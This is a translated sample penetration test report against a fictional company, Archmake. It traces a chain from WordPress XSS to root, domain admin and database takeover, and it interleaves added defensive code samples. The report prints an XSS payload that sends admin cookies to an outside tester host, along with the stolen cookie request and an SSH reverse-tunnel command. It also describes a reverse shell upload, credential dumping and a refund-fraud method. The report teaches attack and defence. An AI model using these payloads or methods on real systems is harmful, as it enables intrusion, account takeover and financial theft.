An Archmake.com Penetration Test Report


Preface
This is a translation of the sample penetration test report released by Offensive Security, the creator of backtrack-linux.org and exploit-db.com.
Overview
Offensive Security was authorized to perform a penetration test against the external website of Archmake. The test simulated a malicious attacker deliberately targeting the company. During the initial information-gathering phase, Archmake was found to expose only one website and one email server, so few targets were available for attack.
During the security assessment of the website, a vulnerable WordPress plugin was found to be installed. This vulnerability was successfully exploited to obtain WordPress administrator access; a reverse interactive shell was then established and escalated to root.
After gaining control of the web server, penetration of the internal network began. After some attempts, domain administrator privileges were obtained. The internal network topology was then analyzed, and the company's internal databases were located and successfully taken over. These databases store not only order and customer information but also transaction-related information; an attacker controlling this system could withdraw cash directly.
Test process
WordPress Vulnerability Exploitation
While gathering information about the target system, we found that the website was built with WordPress 3.3.1. As part of the WordPress assessment we scanned the target site with WPScan and found an insecure plugin:
./wpscan.rb --url www.Archmake.com --enumerate p
[WPScan ASCII-art banner] WPScan v1.1, WordPress Security Scanner by ethicalhack3r.co.uk, sponsored by the RandomStorm Open Source Initiative
| URL: http://www.Archmake.com/
| Started on Tue Jan 24 18:44:49 2012
[!] The WordPress theme in use is called "twentyeleven".
[!] The WordPress "http://www.Archmake.com/readme.html" file exists.
[!] WordPress version 3.3.1 identified from meta generator.
[+] Enumerating installed plugins...
Checking for 2892 total plugins... 100% complete.
[+] We found 2 plugins:
Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.
Name: relevanssi
Location: http://www.Archmake.com/wp-content/plugins/relevanssi/
Directory listing enabled? Yes.
[+] There were 1 vulnerabilities identified from the plugin names:
[!] Relevanssi 2.7.2 WordPress Plugin Stored XSS Vulnerability
* Reference: http://www.exploit-db.com/exploits/16233/
[+] Finished at Tue Jan 24 18:45:30 2012
As the WPScan results show, the Relevanssi plugin has a stored XSS vulnerability. Successful exploitation of this vulnerability can steal the administrator's cookies.
Step 1: Enter the following code in the search bar of the Archmake website:
<script>new Image().src="http://172.16.40.204/p.php?cookie="+document.cookie;</script>

When the WordPress administrator opens "User Searches" in the administration panel, the script executes.

The remote attacker then receives the administrator's cookie on the attacker's server:
GET /p.php?cookie=wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588%7C72c3335ad1e783b75bb3d8cf9e85fc9c;%20wp-settings-time-1=1327925790;%20wordpress_test_cookie=WP+Cookie+check;%20wordpress_logged_in_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1328098588%7Caf1bcabca49191de76ec45e798ae5ada;%20wp-settings-1=editor%3Dhtml;%20wordpress_ed8a4e5dd813c7b5d262130b08955a6a=admin%7C1327599469%7C3ada64cf8e918c9a4bf148896181fc63;%20wordpress_logged_in_ed8a4e5dd813c7b5d262130b08955a6a=admin HTTP/1.1

Setting these values with Firefox's cookie editor bypasses the WordPress login entirely and yields an administrator session.

With administrator access to the WordPress back end, full control of the site can be obtained in many ways. The most direct is to modify a WordPress theme file.
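The cookie theft above works because the session cookies are readable from document.cookie. The following is an added example (not part of the original report): a small audit of Set-Cookie headers that flags WordPress session cookies issued without HttpOnly (which blocks script access), Secure (which keeps them off plaintext HTTP) or a restrictive SameSite. The header values are constructed for the example; the cookie-name patterns assume the standard WordPress naming shown in the captured request.

```python
"""
Added example: audit Set-Cookie headers for the attributes that blunt
cookie theft via XSS.  Not code from the original report.
"""
import re

# Names that carry a WordPress session (wordpress_<hash>, wordpress_logged_in_<hash>,
# wordpress_sec_<hash>); the test cookie carries nothing and is excluded.
SESSION_NAME_PATTERNS = (
    re.compile(r"^wordpress_(?!test_cookie)"),
    re.compile(r"^PHPSESSID$"),
)


def parse_set_cookie(header):
    """Split one Set-Cookie header into (name, value, {attribute: value})."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()   # flags like HttpOnly map to ""
    return name.strip(), value, attrs


def is_session_cookie(name):
    return any(p.search(name) for p in SESSION_NAME_PATTERNS)


def audit_set_cookie(header):
    """Return a list of findings for one Set-Cookie header; empty means acceptable."""
    name, _value, attrs = parse_set_cookie(header)
    findings = []
    if not is_session_cookie(name):
        return findings
    if "httponly" not in attrs:
        findings.append(f"{name}: missing HttpOnly (readable via document.cookie)")
    if "secure" not in attrs:
        findings.append(f"{name}: missing Secure (sent over plaintext HTTP)")
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append(f"{name}: SameSite not Lax/Strict")
    return findings


def audit_response_headers(headers):
    """headers: list of (field, value) pairs as received; returns all findings."""
    findings = []
    for field, value in headers:
        if field.lower() == "set-cookie":
            findings.extend(audit_set_cookie(value))
    return findings


# Constructed sample response: one weak session cookie, one harmless cookie,
# one hardened session cookie.
SAMPLE_HEADERS = [
    ("Content-Type", "text/html; charset=UTF-8"),
    ("Set-Cookie", "wordpress_logged_in_0123abcd=admin%7C1328098588%7Cdeadbeef; path=/"),
    ("Set-Cookie", "wordpress_test_cookie=WP+Cookie+check; path=/"),
    ("Set-Cookie", "wordpress_sec_0123abcd=admin%7C1328098588%7Ccafef00d; path=/wp-admin; "
                   "Secure; HttpOnly; SameSite=Lax"),
]

if __name__ == "__main__":
    for finding in audit_response_headers(SAMPLE_HEADERS):
        print("[!]", finding)
```

Run against the sample, the first session cookie produces three findings and the hardened one none. HttpOnly would not have stopped the stored XSS itself, but the injected script would have had nothing to exfiltrate.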
WordPress Plugin Arbitrary File Upload
With access to the WordPress system, we could now check, white-box, whether other vulnerabilities were exploitable. We audited the plugins installed in WordPress.
One of the plugins allows users to upload avatar images.

Auditing the plugin's source code showed that it restricts the type of uploaded files with a regular expression.

A file name such as ghost.php also passes this regular-expression check and can be uploaded to the server.
Although there are many other ways to place attack tools on the server (such as modifying the theme, as mentioned above), we decided to use this vulnerability for the upload: first, to verify a new vulnerability, and second, to minimize the changes made to the server.

To verify that the upload process behaved exactly as analyzed, we first uploaded a standard image file as a test, then uploaded a PHP script configured as a reverse shell.
Executing this script gives the attacker an interactive shell on a remote server under the attacker's control. Because the shell runs with the web server's privileges, it has only low privileges.
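The report does not reproduce the plugin's regular expression, only that ghost.php passes it. The following is an added example (not the plugin's code or the report's): a constructed weak check that trusts the client-supplied Content-Type, which is one way such a name gets through, beside a hardened check in which the server decides the type from an anchored extension allowlist, a restricted file stem and the file's own magic bytes. File contents and names are constructed for the example.

```python
"""
Added example: weak upload type check beside a hardened one.
The weak check is a constructed stand-in, not the vulnerable plugin's code.
"""
import os
import re

# Constructed weak check: a regex over the MIME type the client declares.
# The client controls that header, so "ghost.php" declared as image/jpeg passes.
_WEAK_TYPE_RE = re.compile(r"^image/(jpeg|png|gif)$", re.I)


def weak_is_allowed(filename, declared_type, data):
    return bool(_WEAK_TYPE_RE.match(declared_type))


# Hardened check: allowlist of extensions, each tied to the magic bytes a real
# file of that type must start with.  The client's declared type is ignored.
ALLOWED = {
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
}
# One extension only: the stem may not contain a dot, so "x.php.png" is rejected.
_SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def hardened_upload_name(filename, declared_type, data):
    """Return the sanitized name to store the file under, or None to reject it."""
    name = os.path.basename(filename.replace("\\", "/"))   # drop any directory part
    stem, ext = os.path.splitext(name)
    ext = ext.lower()
    if ext not in ALLOWED:                 # anchored allowlist, never a blacklist
        return None
    if not _SAFE_STEM.fullmatch(stem):     # no second extension, no odd characters
        return None
    if not data.startswith(ALLOWED[ext]):  # content must match the extension
        return None
    return stem + ext


# Constructed sample uploads: a minimal PNG header and a PHP file.
PNG_BYTES = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_BYTES = b"<?php echo 'test'; ?>"

if __name__ == "__main__":
    print("weak check on ghost.php:", weak_is_allowed("ghost.php", "image/jpeg", PHP_BYTES))
    print("hardened check on ghost.php:", hardened_upload_name("ghost.php", "image/jpeg", PHP_BYTES))
    print("hardened check on avatar.png:", hardened_upload_name("avatar.png", "image/png", PNG_BYTES))
```

Even with the hardened check, uploads belong in a directory where the web server does not execute scripts, so a validation bug cannot turn into code execution on its own.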



Linux Local Privilege Escalation
After obtaining an interactive shell on the target web server, the next goal was root on the system.
Information about the target system: Linux version 2.6.32-5-686 (Debian 2.6.32-38) (ben@decadent.org.uk) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Mon Oct 3 04:15:24 UTC 2011
After some research and testing, we found that this system is affected by a race-condition vulnerability. We first uploaded the exploit code using the avatar upload plugin.

After unpacking the archive, adding execute permission and running the exploit, we obtained root.

The web server can now serve as a stepping stone for a malicious attacker into the internal network. In a real attack, no data on the web server could be trusted any longer, because the attacker could modify it at will.
Maintaining Server Access
After obtaining administrative control of the server, a more stable connection is needed for the subsequent penetration.
Inspecting the server showed its SSH service running on port 22000. We decided to use SSH to forward ports into the internal network: this is convenient and adds no additional security risk to the server.
To minimize system changes, we did not add an account or change any account's password; instead we used SSH key-based authentication.
As mentioned above, SSH on our own (tester-controlled) server listens on port 53. Port 22000 of the web server can be forwarded to it with the following command:
ssh -o 'StrictHostKeyChecking no' -R 22000:127.0.0.1:22000 -p 53 172.16.40.204 ping 127.0.0.1
In addition, a SOCKS proxy was created so that the services on the target network could be reached through it.
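The persistence step above deliberately adds an SSH key rather than an account, so neither the password file nor the login records change; the trace is the extra authorized_keys entry. As an added example (not part of the original report), the script below computes OpenSSH-style SHA256 fingerprints for every key in a set of authorized_keys files and reports any fingerprint missing from an allowlist. The key blobs, file contents and allowlist are constructed (the blobs are well-formed ed25519 wire encodings with made-up public key bytes).

```python
"""
Added example: find authorized_keys entries that are not on an allowlist of
known key fingerprints.  Not code from the original report.
"""
import base64
import hashlib


def _ssh_string(b):
    """OpenSSH wire encoding of a string: 4-byte big-endian length + bytes."""
    return len(b).to_bytes(4, "big") + b


def make_ed25519_blob(pubkey_bytes):
    """Constructed key blob: string "ssh-ed25519" followed by the 32-byte key."""
    return base64.b64encode(_ssh_string(b"ssh-ed25519") + _ssh_string(pubkey_bytes)).decode()


def fingerprint(b64_blob):
    """SHA256 fingerprint as ssh-keygen -l prints it: base64(sha256(blob)) without padding."""
    raw = base64.b64decode(b64_blob)
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text):
    """Yield (key_type, fingerprint, comment) for each key line.

    Leading option lists (e.g. no-pty,no-X11-forwarding) are skipped by locating
    the key-type field; options containing quoted spaces are not handled here.
    """
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        idx = next((i for i, f in enumerate(fields)
                    if f.startswith(("ssh-", "ecdsa-", "sk-"))), None)
        if idx is None or idx + 1 >= len(fields):
            continue
        key_type, blob = fields[idx], fields[idx + 1]
        comment = " ".join(fields[idx + 2:])
        try:
            fp = fingerprint(blob)
        except ValueError:          # malformed base64: report it as its own finding
            fp = "INVALID"
        yield key_type, fp, comment


def unexpected_keys(files, allowlist):
    """files: {path: file contents}; returns [(path, key_type, fingerprint, comment)] not allowlisted."""
    findings = []
    for path, text in files.items():
        for key_type, fp, comment in parse_authorized_keys(text):
            if fp not in allowlist:
                findings.append((path, key_type, fp, comment))
    return findings


# Constructed keys and allowlist.
KNOWN_BLOB = make_ed25519_blob(bytes(range(32)))
ROGUE_BLOB = make_ed25519_blob(bytes(range(32, 64)))
ALLOWLIST = {fingerprint(KNOWN_BLOB)}

# Constructed file contents: the web server's service account has gained a key.
SAMPLE_FILES = {
    "/root/.ssh/authorized_keys":
        f"# operations key\nssh-ed25519 {KNOWN_BLOB} ops@bastion\n",
    "/var/www/.ssh/authorized_keys":
        f"ssh-ed25519 {KNOWN_BLOB} ops@bastion\n"
        f"no-pty,no-X11-forwarding ssh-ed25519 {ROGUE_BLOB}\n",
}

if __name__ == "__main__":
    for path, key_type, fp, comment in unexpected_keys(SAMPLE_FILES, ALLOWLIST):
        print(f"[!] {path}: {key_type} {fp} {comment!r}")
```

On a real host the dictionary would be filled from every user's ~/.ssh/authorized_keys plus any AuthorizedKeysFile paths in sshd_config, and the allowlist from the fingerprints your key inventory knows. The sshd listening on a non-default port (22000 here) is also worth including in the inventory, since the tunnel in the report is invisible to checks that only look at port 22.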

Splunk Vulnerability
While analyzing the compromised web server, we found an internal network segment, 10.10.0.x. Scanning and analyzing this segment, we found a Splunk server.
Splunk versions earlier than 4.2.5 have a high-risk remote command execution vulnerability. Through the SOCKS proxy described above, we accessed the Splunk web interface and confirmed that its version is 4.2.2.

On Windows, Splunk generally runs with SYSTEM privileges, so an administrator user can be added directly.

This command-execution vulnerability returns no output; whether the command succeeded can only be verified by logging in over Remote Desktop.

We now control another Windows server on the internal network.
Obtaining Domain Administrator Privileges
With a foothold on a Windows host inside the network, the next step was to obtain domain administrator privileges. We uploaded WCE (Windows Credentials Editor) to the Splunk server. WCE reads authentication material from memory, which can then be reused for further access.
Running wce.exe on the Splunk server retrieved the domain administrator's credentials from memory.

With this authentication material, a shell with domain administrator privileges is easily obtained.

From that shell, the Microsoft Management Console can be run.

Database Exploitation
After taking control of the Splunk server, a CSV file was found on its local file system.

Analysis showed that it contained customer information exported from a database.

Evidently it had been exported by the program exportcsv.exe. Analyzing the program with OD (OllyDbg) showed that it connects directly to an MS SQL server, with the connection credentials hard-coded in the program.

With these credentials we could connect to the database directly and thereby control all of its data.

Analysis of the exported database data found a large amount of customer information, including user IDs, names, email addresses, phone numbers and hashed passwords.

The passwords were hashed with MD5. We imported the hashes into the password-cracking system we maintain: of 1000 hashes imported, 996 were cracked after 22 seconds. (Aside: how is that even possible...)
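The 996-of-1000 result follows from how the passwords were stored, not from an exotic cracking rig: unsalted MD5 means one fast hash per candidate, and that one hash is checked against every user at once. The following is an added example (not part of the original report) that shows the failure mode on a constructed user table and, beside it, the storage scheme that resists it: PBKDF2-HMAC-SHA256 with a random per-user salt and a high iteration count (bcrypt, scrypt or Argon2 are the other standard choices). Users, passwords and the wordlist are constructed.

```python
"""
Added example: unsalted MD5 storage beside salted PBKDF2 storage.
Not code from the original report.
"""
import hashlib
import hmac
import os

ITERATIONS = 600_000   # per-guess cost; tune so one verification takes ~100 ms on your hardware


def md5_store(password):
    """The scheme found in the report's database: a single unsalted MD5."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_unsalted_md5(stored_hashes, wordlist):
    """Why unsalted MD5 falls fast: hash the wordlist once, look every user up in it."""
    table = {md5_store(word): word for word in wordlist}
    return {h: table[h] for h in stored_hashes if h in table}


def pbkdf2_store(password, salt=None, iterations=ITERATIONS):
    """Salted, iterated hash; the salt and iteration count are stored alongside."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def pbkdf2_verify(password, stored):
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unknown hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)   # constant-time comparison


def hashes_needed(n_users, n_candidates, salted):
    """Work an attacker must do to try every candidate against every user."""
    return n_candidates * (n_users if salted else 1)


# Constructed user table stored the way the report found it.
SAMPLE_USERS = {
    "alice": md5_store("password"),
    "bob": md5_store("123456"),
    "carol": md5_store("Xq9!vL2#pT"),
}
WORDLIST = ["password", "123456", "qwerty", "letmein"]

if __name__ == "__main__":
    cracked = crack_unsalted_md5(SAMPLE_USERS.values(), WORDLIST)
    for user, h in SAMPLE_USERS.items():
        print(user, "->", cracked.get(h, "<not in wordlist>"))
    print("guesses for 1000 users, 1M candidates: unsalted",
          hashes_needed(1000, 1_000_000, salted=False),
          "salted", hashes_needed(1000, 1_000_000, salted=True))
```

With per-user salts the same wordlist has to be rehashed for each of the 1000 users, and with PBKDF2's iteration count each of those hashes costs hundreds of thousands of times more than an MD5; the 22-second result becomes years for the same hardware, and strong passwords like carol's stay out of reach regardless.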

Controlling Archmake Transactions
During in-depth analysis of the database, we noticed that many tables were updated regularly. Monitoring and analysis of these tables showed that they were order-related: order information is regularly written to the database and, after some time, processed differently depending on the "Category" field.

After monitoring the database and inserting some test data, the meaning of the Category field was summarized as follows:

Once the transaction type is determined, the related information is inserted into this table. We found that if a row is inserted with a valid user ID, the user's card information replaced by a card controlled by the attacker, and transaction type 4 (4 is a refund), an arbitrary amount can be withdrawn to the attacker's card account. This was confirmed in a controlled environment.
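The root cause is that the processing job trusts whatever appears in the orders table: a refund row needs no original payment, no amount ceiling and no check that the payout card is the card that paid. As an added example (not part of the original report), the validator below applies exactly those three checks before a Category 4 row is processed. The ledger, field names and the payment category value are constructed; only "4 = refund" comes from the report.

```python
"""
Added example: server-side validation of a refund row before it is processed.
Not code from the original report; field names and ledger are constructed.
"""
from dataclasses import dataclass
from decimal import Decimal
from typing import Optional

CATEGORY_PAYMENT = 1   # constructed value
CATEGORY_REFUND = 4    # from the report: category 4 is a refund


@dataclass
class Txn:
    txn_id: str
    user_id: int
    category: int
    amount: Decimal
    card_token: str                    # tokenized card reference, never a raw PAN
    ref_txn_id: Optional[str] = None   # for refunds: the payment being refunded


class Ledger:
    def __init__(self, txns):
        self.txns = {t.txn_id: t for t in txns}

    def refunded_so_far(self, payment_id):
        """Sum of refunds already booked against one payment."""
        return sum((t.amount for t in self.txns.values()
                    if t.category == CATEGORY_REFUND and t.ref_txn_id == payment_id),
                   Decimal("0"))

    def validate_refund(self, refund):
        """Return (ok, reason).  A refund must point at a captured payment by the
        same user, go back to the card that paid, and not exceed the unrefunded balance."""
        if refund.category != CATEGORY_REFUND:
            return False, "not a refund"
        original = self.txns.get(refund.ref_txn_id)
        if original is None or original.category != CATEGORY_PAYMENT:
            return False, "refund does not reference a captured payment"
        if original.user_id != refund.user_id:
            return False, "user mismatch with original payment"
        if refund.card_token != original.card_token:
            return False, "refund destination differs from paying card"
        if refund.amount <= 0:
            return False, "non-positive amount"
        remaining = original.amount - self.refunded_so_far(original.txn_id)
        if refund.amount > remaining:
            return False, "amount exceeds unrefunded balance"
        return True, "ok"


def check_refund(ledger, user_id, amount, card_token, ref_txn_id=None, txn_id="R-new"):
    """Convenience wrapper: build the candidate refund row from plain values and validate it."""
    row = Txn(txn_id, user_id, CATEGORY_REFUND, Decimal(amount), card_token, ref_txn_id)
    return ledger.validate_refund(row)


# Constructed ledger: one captured payment of 120.00 and one earlier 20.00 refund of it.
SAMPLE_LEDGER = Ledger([
    Txn("P1", 1001, CATEGORY_PAYMENT, Decimal("120.00"), "tok_A"),
    Txn("R1", 1001, CATEGORY_REFUND, Decimal("20.00"), "tok_A", ref_txn_id="P1"),
])

if __name__ == "__main__":
    # The pattern from the report: valid user ID, attacker's card, category 4, any amount.
    print(check_refund(SAMPLE_LEDGER, 1001, "5000.00", "tok_other"))
    # A legitimate partial refund of the remaining balance.
    print(check_refund(SAMPLE_LEDGER, 1001, "50.00", "tok_A", ref_txn_id="P1"))
```

The first call is rejected because no captured payment backs it; pointing it at P1 would still fail on the card check, and even the right card cannot draw more than the 100.00 still unrefunded. These checks belong in the processing job (and ideally in database constraints), not in the front end that writes the rows, because the report shows that the rows can be written by anyone holding the hard-coded database credentials.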
 
